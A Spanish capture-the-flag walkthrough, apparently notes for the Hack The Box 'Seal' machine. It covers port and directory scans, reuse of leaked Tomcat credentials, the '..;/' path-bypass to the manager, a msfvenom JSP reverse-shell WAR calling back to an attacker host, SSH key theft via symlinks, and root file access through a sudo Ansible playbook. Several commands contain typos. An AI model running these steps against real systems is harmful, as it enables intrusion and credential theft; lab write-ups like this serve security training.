echo "10.129.186.118  seal.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA seal 10.129.186.118 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210721094438.png

nmap -sC -sV -O -p- -oA seal 10.129.186.118

nmap -sU -O -p- -oA seal-udp 10.129.186.118

nikto -h 10.129.186.118:80

gobuster dir -k -u http://10.129.186.118/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

fuff -w /usr/share/wordlists/dirb/big.txt -u http://10.129.186.118/FUZZ -t 200

Pasted image 20210721094710.png

Vamos a http://10.129.186.118:8080

Pasted image 20210721095104.png

Vamos a http://10.129.186.118:8080/register y creamos un usuario

Pasted image 20210721095235.png

Vamos a root /seal market y vemos tomcat-users.xml

Pasted image 20210721095806.png

Encontramos el usuario tomcat con su contraseña

Pasted image 20210721095823.png

Vamos a http://10.129.186.118/manager/status

Y usamos las credenciales de tomcat que encontramos en el paso anterior.

Pasted image 20210721100143.png

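Vamos a http://10.129.186.118/manager/status/..;/html

Tomcat trata `;` como separador de parámetros de ruta, así que resuelve `..;/` como `..`. Si delante hay un filtro o proxy que compara la ruta literal, este no reconoce el salto de directorio. La mitigación es normalizar la ruta antes de aplicar el control de acceso, o rechazar las peticiones que contengan `;` en la ruta.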

Pasted image 20210721100334.png

msfvenom ip java/jsp_shell_reverse_tcp LHOST=10.10.14.95 LPORT=4444 -f war -o seal_shell.war

Pasted image 20210721100655.png

Subimos el archivo war en la página de aplicaciones

Pasted image 20210721100811.png

Refrescamos la página y vemos que seal_shell.war se subió

Le damos click a deploy

nc -lvnp 4444

Pasted image 20210721111901.png

Conseguimos un reverse shell

ps -aux | grep -i 'bin/sh'

Pasted image 20210721112538.png

ls -ahl /opt/backups/archives

cd /var/lib/tomcat9/webapps/ROOT/admin/dashboard/

cd /home

cd luis

Pasted image 20210721112823.png

ln -s /home/luis.ssh /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads

cd .ssh

cp /opt/backups/archives/backup-2021-07-21-17\:30\:33.gz rsa.gz

gzip -kd rsa

Pasted image 20210721113613.png

cd .ssh

python3 -m http.server 8888

wget http://10.129.186.118:8888/id_rsa.pub

chmod 600 id_rsa

ssh -i id_rsa luis@seal.htb

Pasted image 20210721121032.png

Crear archivo root.yml

# Single-play playbook targeting localhost: one copy task that runs with
# privilege escalation (become: true).
# NOTE(review): the walkthrough launches this file through sudo
# ansible-playbook. A sudoers rule that lets an unprivileged user run
# ansible-playbook on a playbook they authored is equivalent to unrestricted
# root; such rules should be limited to fixed, root-owned playbook paths.
- name: Ansible Copy Example Local to Remote
  hosts: localhost
  tasks:
    - name: copying file with playbook
      become: true 
      copy:
        # Reads a file under /root and writes it to /dev/shm.
        src: /root/root.txt
        dest: /dev/shm
        # Ownership of the copy is handed to the luis user and group.
        owner: luis
        group: luis        
        # 0777 grants read/write/execute to everyone. The value is unquoted;
        # Ansible's documentation recommends quoting modes (e.g. "0777") so
        # the YAML parser cannot reinterpret the number.
        mode: 0777

sudo /usr/bin/ansible-playbook root.yml

Pasted image 20210723162019.png
